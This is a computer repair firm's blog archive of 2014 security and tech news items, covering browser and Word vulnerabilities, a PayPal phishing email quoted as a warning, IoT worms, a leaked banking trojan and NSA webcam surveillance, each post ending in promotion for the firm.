• Tag Archives computer news
  • New Zero Day Vulnerability Found In Internet Explorer All versions


    A new zero-day vulnerability that resides in all versions of Internet Explorer has been spotted in the wild, Microsoft confirmed late Saturday.

    The vulnerability, which could allow remote code execution, is being used in “limited, targeted attacks,” according to an advisory issued by Microsoft. While all versions of the web browser, IE 6 through 11, are affected by the vulnerability, attacks are currently targeting IE versions 9, 10 and 11, according to security firm FireEye, which first reported the flaw Friday.

    The attack leverages a previously unknown “use after free” vulnerability — data corruption that occurs after memory has been released — and bypasses both Windows DEP (data execution prevention) and ASLR (address space layout randomization) protections, according to FireEye.

    The vulnerability is currently being exploited by a group of hackers targeting financial and defense organization in the US, FireEye told CNET.

    “The APT [advanced persistent threat] group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past,” FireEye said. “They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure.”

    FireEye said the flaw was significant because it affects more than a quarter of the total browser market.

    “Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market,” FireEye said in its advisory.

    An attack could be triggered by luring visitors to a specially crafted web page, Microsoft explained.

    “The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated,” Microsoft said. “The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer.”

    Microsoft said it is investigating the vulnerability and may issue an out-of-cycle security update to address the issue.

    Please visit ccrepairservices.com

    for latest computer repair and online news.

    Local and Online Virus removal and computer repairs anytime, anywhere



  • PayPal “Unauthorized Credit Card Payment” Phish

    A fake PayPal email, addressed “Dear PayPal”, with an attachment to fill in? What could possibly go wrong?

    Fake mail

    The email reads as follows:

    Dear PayPal user,

    We recently received a report of unauthorized credit card payment attempt associated with this account. To protect you against any further unauthorised payment attempts, we’ve limited access to your PayPal account.
    Please take a minute to review the details below and what steps you need to take to remove the limits.

    ———————————–
    Details of disputed transaction
    ———————————–
    Case ID Number: PP-001-546-712-049
    ———————————–
    What to do next
    ———————————–

    Please download the form attached to this email and open it in a web browser.
    Once opened, you will be provided with steps to restore your account access.
    We appreciate your understanding as we work to ensure your account safety.

    ———————————–
    Due dates
    ———————————–
    Please get back to us as soon as possible.
    ———————————–
    Other details
    ———————————–
    There are no other details for this transaction at this time.

    Yours sincerely,
    PayPal

    Just like the spam from mid-February, this one comes with a zipped attachment:

    Case ID Number PP-001-546-712-049

    with a .html file inside called…well, you can probably guess what it’s called:

    Case ID Number PP-001-546-712-049.html

    html attachment

    The form asks for:

    Email address, full name, PayPal password, DOB, billing address / town, county, postcode, home phone, credit / debit card number, expiry date, security code and sort code.

     

    Of course, you shouldn’t fill this in or hit the “Send” button – just delete the attachment and send the mail to the spam folder.

    Complete Online Computer news and Repair

    WWW.CCREPAIRSERVICES.COM


  • Microsoft announces vulnerability when viewing RTF documents in Word

    Microsoft yesterday announced a new vulnerability in Word where specially crafted RTF files could cause your computer to execute commands without your permission. Microsoft Security Advisory (2953095) explains how attackers are currently using this vulnerability to execute commands on computers that open these types of RTF documents. This vulnerability also exists in Outlook if it is configured to use Word as its email viewer.

    The advisory states:

    Quote

    Microsoft is aware of a vulnerability affecting supported versions of Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word, or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.

    At this point there is no patch available, but Microsoft has released a Fixit that can be used to disable the opening of RTF content in Word. This fixit should be used by all users of Word until an official patch is released.

    Please visit ccrepairservices.com

    for latest computer repair and online news.

    Local and Online Virus removal and computer repairs anytime, anywhere


  • Linux Worm targets Internet-enabled Home appliances to mine Cryptocurrencies

    Could a perfectly innocent looking device like router, TV set-top box or security cameras can mine Bitcoins? YES! Hackers will not going to spare the Smart Internet-enabled devices.

     

    A Linux worm named Linux.Darlloz, earlier used to target Internet of Things (IoT) devices, i.e. Home Routers, Set-top boxes, Security Cameras, printers and Industrial control systems; now have been upgraded to mine Crypto Currencies like Bitcoin.

    Security Researcher at Antivirus firm Symantec spotted the Darlloz Linux worm back in November and they have spotted the latest variant of the worm in mid-January this year.

    Linux.Darlloz worm exploits a PHP vulnerability (CVE-2012-1823) to propagate and is capable to infect devices those run Linux on Intel’s x86 chip architecture and other embedded device architectures such as PPC, MIPS and MIPSEL.

    The latest variant of Linux.Darlloz equipped with an open source crypto currency mining tool called ‘cpuminer’, could be used to mine Mincoins, Dogecoins or Bitcoins.

    Symantec Researchers scanned the entire address space of the Internet and found 31,716 devices infected with Darlloz. “By the end of February 2014, the attacker mined 42,438 Dogecoins (approximately US$46 at the time of writing) and 282 Mincoins (approximately US$150 at the time of writing). These amounts are relatively low for the average cybercrime activity so, we expect the attacker to continue to evolve their threat for increased monetization.” Kaoru Hayashi, senior development manager and threat analyst with Symantec in Japan.

    Major infected countries are China, the U.S., South Korea, Taiwan and India.

    Darlloz hack malware

    Crypto Currency typically requires more memory and a powerful CPUs, so the malware could be updated to target other IoT devices in the future, such as home automation devices and wearable technology.A Few weeks back, Cisco has announced a global and industry-wide initiative to bring the Security community and Researchers together to contribute in securing the Internet of Things (IoT) and launched a contest called the “Internet of Things Grand Security Challenge“, offering prizes of up to $300,000 for winners.

    Users are advised to update firmware and apply security patches for all software installed on computers or Internet-enabled devices. Make sure, you are not using default username or password for all devices and block port 23 or 80 from outside if not required.

    Please visit ccrepairservices.com

    for latest computer repair and online news.

    Local and Online Virus removal and computer repairs anytime, anywhere


  • HP expected to announce 3D printers in June Durability issues resolved, says Whitman

     Hewlett Packard will outline plans to enter the commercial 3D-printing market in June, saying it has solved a number of technical problems that have hindered broader adoption of the high-tech manufacturing process.

    Chief executive Meg Whitman told shareholders on Tuesday the company will make a “big technology announcement” this month around how it will approach a market that has excited the imagination of investors and consumers alike.

    However critics have accused the sci-fi-like technology of being over-hyped and still too immature for widespread consumer adoption.

    Industry observers have long expected HP,a dominant force in global printer manufacturing, to eventually get into the business. Whitman said HP’s inhouse researchers have resolved limitations involved with the quality of substrates used in theprocess, which affects the durability of finished products.

    “We actually think we’ve solved these problems,” Whitman told an annual shareholders meeting. “The bigger market is going to be in the enterprise space,” manufacturing parts and prototypes in ways that were not possible before.

    “We’re on the case,” she said without elaborating.

    HP executives have estimated that worldwide sales of 3D printers and related software and services will grow to almost $11 billion (AUD$12.2 billion) by 2021 from a mere $2.2 billion in 2012.

    The nascent 3D-printing market is now dominated by a number of smaller players like MakerBot, a unit of Stratasys that is concentrating on selling more affordable devices to consumers.

    Contract manufacturers like Flextronics however already use the technology to help craft prototype parts or devices for corporate clients.

    “HP is currently exploring the many possibilities of 3D printing and the company will play an important role in its development,”

    CTO and HP Labs director Martin Fink said in a February blogpost on HP’s website.

    “The fact is that 3D printing is really still an immature technology, but it has a magical aura. The sci-fi movie idea that you can magically create things on command makes the idea of 3D printing really compelling for people.”

     

    Complete Online Computer news and Repair

    WWW.CCREPAIRSERVICES.COM


  • Ex-Microsoft employee charged with leaking trade secrets

    Allegedly gave pre-release Windows info to a blogger.

    A former employee of Microsoft is facing criminal charges after he allegedly passed trade secrets to a blogger in France, US court documents showed.

    Russian national Alex Kibkalo, a former Microsoft employee in Lebanon and Russia, admitted to Microsoft investigators that he provided confidential company documents and information to the blogger, documents from a Seattle federal court showed.

    The blogger, who was not identified, was known to those in the Microsoft blogging community for posting screenshots of pre-release versions of the Windows operating system. The blogger hid his identity stating falsely that he was from Quebec, according to the documents.

    An internal investigation by Microsoft revealed unauthorised transmissions of proprietary and confidential trade secrets, according to the court documents. An email from Kibkalo was found within the blogger’s Hotmail account, establishing that he shared confidential data.

    “We take protection of our intellectual property very seriously, including cooperating with law-enforcement agencies who are investigating potential criminal actions by our employees or others,” a Microsoft spokesman said in a statement.

    A lawyer representing Kibkalo could not be reached for comment immediately.

    The court documents said during interviews, the blogger admitted to posting information on Twitter and his websites and selling Windows Server activation keys on eBay.

    According to Microsoft’s investigation, in July and August 2012, Kibkalo uploaded proprietary software including pre-release software updates of Windows 8 RT, as well as the Microsoft Activation Server Software Development Kit (SDK) to a computer in Washington and subsequently to his personal Windows Live SkyDrive account.

    Kibkalo, who worked with Microsoft for seven years, received a poor performance review in 2012 and threatened to resign if the review was not amended, the documents showed.

    According to an FBI agent who was part of the investigation, Kibkalo has relocated to Russia and based on a LinkedIn account, he is currently working for another US-based technology company with offices in Moscow and St. Petersburg.

     

    Please visit ccrepairservices.com

    for latest computer repair and online news.

    Local and Online Virus removal and computer repairs anytime, anywhere


  • Facebook ‘Watch naked video of friends’ Malware scam infects 2 million users

    Facebook Watch naked video of friends

    We have seen a lot of Facebook malware and virus infections spreading through friends list, and this time a new clickjacking scam campaign is going viral on Facebook.

    Hackers spam Facebook timeline with a friend’s picture and “See (Friend)’s naked video,” or “(Friend Name’s) Private Video.”

    The Picture appears to be uploaded by a friend and definitely, you might want to see some of your Facebook friends naked, But Beware! If you get curious and click, you will be redirected to a malicious website reports that your Flash Player is not working properly and needs to be re-installed.

    But in actuality it will install a malware in your system and once approved, several disguised thing can happen to you. It further installs a malicious browser extension to spread the scam and steal users’ photos.

    Facebook 'Watch naked video of friends' malware scam infects 2 million people

    When the link is clicked, users are sent to a very realistic-looking mockup of a YouTube page, where the hackers will try to immediately install the Malware Trojan.” 

    So, Don’t Click it! According to the report, 2 million Facebook users are already infected with the same malware campaign and unknowingly flood their friend’s timeline will same campaign. Clicking on the message will automatically publish the same link on the victims Facebook wall potentially allowing friends to click on it.

    Malware often takes advantage of the fact that you trust your friends. So, keep an eye on the links and messages from your friends, and if in doubt, ask them they actually sent you something or not.

    The recent malware attacks are just a few examples of the dangers of using the social network Facebook. Stay safe by keeping your browser up-to-date and install operating system updates when they are released. Please ensure you share this news with your Facebook friends to make all of them aware of it.

     

    Complete Online Computer news and Repair

    WWW.CCREPAIRSERVICES.COM


  • Microsoft will Alert Windows XP users to Upgrade

    In case you didn’t know already, Microsoft will be dropping support for Windows XP (SP3) and Office 2003 on April 8, 2014. From this date onwards, Microsoft will no longer provide new security updates, non-security hotfixes, free or paid assisted support options or online technical content updates.

    As such, use of Windows XP after this date (on non-isolated systems) is strongly discouraged. Indeed, to encourage PC owners to upgrade from Windows XP Microsoft will be presenting an official notification on the desktop of those Windows XP customers who are using the Home or Professional editions and who have elected to receive updates via Windows Update.

    The notification will look like this:

    Notification_5F00_64E154AA.jpg

    Note: this is a genuine notification and not a symptom of malware (which often uses similar looking prompts to entice a user to download further malicious software.

    Microsoft have also partnered with Laplink to provide Windows XP users with a free data migration tool called PCmover Express. This tool for Windows XP will copy over your files and settings from your Windows XP PC to a new device running Windows 7, Windows 8 or Windows 8.1. It will be available for download from windowsxp.com soon.

     

    WWW.CCREPAIRSERVICES.COM


  • Windows 8 had more vulnerabilities than previous versions of Windows

    Microsofts Windows 8 platform has been tagged by security research firm Secunia as being the most vulnerable Windows platform on the market….according to their research, Windows 8 had more vulnerabilities than previous versions of Windows that are currently supported by Microsoft for 2013….the answer is quite simple; Flash. Because Flash is now baked into the modern instance of IE, any Flash vulnerability can now be tied into Windows 8 as well.

    flashwin8.png

    Visit www.ccrepairservices.com for all latest computer repair and related news online


  • Dirty NSA hacked into Webcam of millions of Yahoo users for Private images

    Once again, a new revelation showed the ugly side of the Government who are conducting Global Mass surveillance and previous documents leaked by the whistleblower Edward Snowden have defaced the US Intelligence Agency NSA, who were taking care of a number of projects like PRISM, XKeyscore, DROPOUTJEEP, and various others to carry out surveillance of millions of people.

    Now, it has been revealed that the US National Security Agency (NSA) helped its British counterpart, the Government Communications Headquarters (GCHQ), to allegedly capture and store nude images and others from webcam chats of millions of unsuspecting Yahoo users, The Guardian reported.

    Documents handed to the Guardian by the former NSA contractor Edward Snowden show that the GCHQ’s worked with the US intelligence agency NSA on a joint project dubbed as ‘Optic Nerve’. The project carried out a bulk surveillance program, under which they nabbed webcam images every five minutes from random Yahoo users’ video chats and stored them in a database.

    The project didn’t target individual users; rather it targeted Yahoo webcam chats between 2008 and 2010. Indeed, the method of collection appears somewhat recklessly, and in just six months of period alone, the still images of about 1.8 million users were captured and stored in the government servers in 2008.

    Instead of saving full videos, the program logged one image every five minutes from a user’s chat. The document says that between 3 and 11 percent of the images taken contain “undesirable nudity.

    One GCHQ document states, “It would appear that a surprising number of people use webcam conversations to show intimate parts of their body to the other person.

    The collected webcam information was stored in the NSA’s XKeyscore search tool, and the NSA research was used to build the tool which identified Yahoo’s webcam traffic, reads the report.

    NSA Optic Nerve Webcam hacking

    GCHQ webcam spying program, Optic Nerve, was still active in 2012, according to an internal GCHQ wiki page accessed that year.

    Why Images??? It is known from the revealed documents that the images were collected by the government agency, so that the group could experiment with facial recognition.

    Face detection has the potential to aid selection of useful images for ‘mugshots’ or even for face recognition by assessing the angle of the face,” it reads. “The best images are ones where the person is facing the camera with their face upright.

    NSA Optic Nerve Webcam hacking

    The GCHQ agency staffs were allowed to display “webcam images associated with similar Yahoo identifiers to your known target”, the document reads, also it states “Bulk surveillance of Yahoo users was begun” as “Yahoo webcam is known to be used by GCHQ targets.

    Not Surprising, because your knotty private webcam sex session you loved and enjoyed with your lover four years back was potentially pored over by the suits at GCHQ.

    Yahoo has reacted furiously and denied any prior knowledge of the webcam interception program, and said that it had no awareness of or involvement with the GCHQ collection, describing the activity as “a whole new level of violation of our users’ privacy.

    And a GCHQ spokesman said in a statement, “It is a longstanding policy that we do not comment on intelligence matters. Furthermore, all of GCHQ’s work is carried out in accordance with a strict legal and policy framework which ensures that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the secretary of state, the interception and intelligence service commissioners and the Parliamentary Intelligence and Security Committee,” adding, “All our operational processes rigorously support this position.

    The NSA spokesperson declined to respond saying, “As we’ve said before, the National Security Agency does not ask its foreign partners to undertake any intelligence activity that the US government would be legally prohibited from undertaking it.

    This is how our privacy is getting ruined by the government intelligence officials that we all trust blindly.

    Latest Computer news and virus and malware threats at Complete computer Repair Services Fort Lauderdale and all South Florida Latest Computer News and Repair Services

    www.ccrepairservices.com


  • Android iBanking Trojan Source Code LEAKED ONLINE

    Smartphone is the need of everyone today and so the first target of most of the Cyber Criminals. Malware authors are getting to know their market and are changing their way of operations. Since last year we have seen a rise in the number of hackers moving from the Blackhat into the Greyhat.

     

    iBanking, a new mobile banking Trojan app which impersonates itself as an Android ‘Security App‘, in order to deceive its victims, may intimidate a large number of users as now that its source code has been leaked online through an underground forum.

    It will give an opportunity to a larger number of cybercriminals to launch attacks using this kind of ready-made mobile malware in the future.

     

    Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, by sending unique one-time-use codes to their customers’ registered phone numbers via SMS, but in order to defraud them, cyber criminals have started to create various mobile malware like iBanking to solve their purpose.

     In addition, with the iBanking malware, Computer malware is used to defeat the mobile-based security mechanisms used by the banking sites.

    Apart from the server-side source-code, the leaked files also include a builder that can un-pack the existing iBanking APK file and re-pack it with different configurations, essentially providing fraudsters with the means to create their own unique application,” added Daniel Cohen.

    In addition to SMS Sniffing, the iBanking app allows an attacker to redirect calls to any pre-defined phone number, capture audio using the device’s microphone and steal other confidential data like call history log and the phone book contacts.

    During the installation process, the malicious app attempts to Social Engineer the user into providing it with administrative rights, making its removal much more difficult.

    Latest Computer news and virus and malware threats at Complete computer Repair Services Fort Lauderdale and all South Florida Latest Computer News and Repair Services

    www.ccrepairservices.com


  • Mass Exploit of Linksys Routers

    It has been revealed that a vulnerability in possibly 23 different models of Linksys (Belkin) routers has been exploited by a worm known as The Moon.

     

    The exploit was first noticed about a week ago and reported by the Internet Storm Center. The Worm bypasses authentication on the router to take control. Linksys state that “the router starts flooding the network with ports 80 and 8080 outbound traffic, resulting in heavy data activity”. The worm also attempts to detect any vulnerable systems on the router’s network for exploitation.

     

    Current intentions of The Moon are not yet known, however, there is code within the worm which seems to suggest that it may be gathering infected routers into a network of compromised devices through a command and control system.

     

    Linksys will be issuing a firmware update to fix the vulnerability in the next few weeks. But for now, if you’re using a Linksys router, you should read the advice given here to disable Remote Access Management.

     

    Latest Computer news and virus and malware threats at Complete computer Repair Services

    www.ccrepairservices.com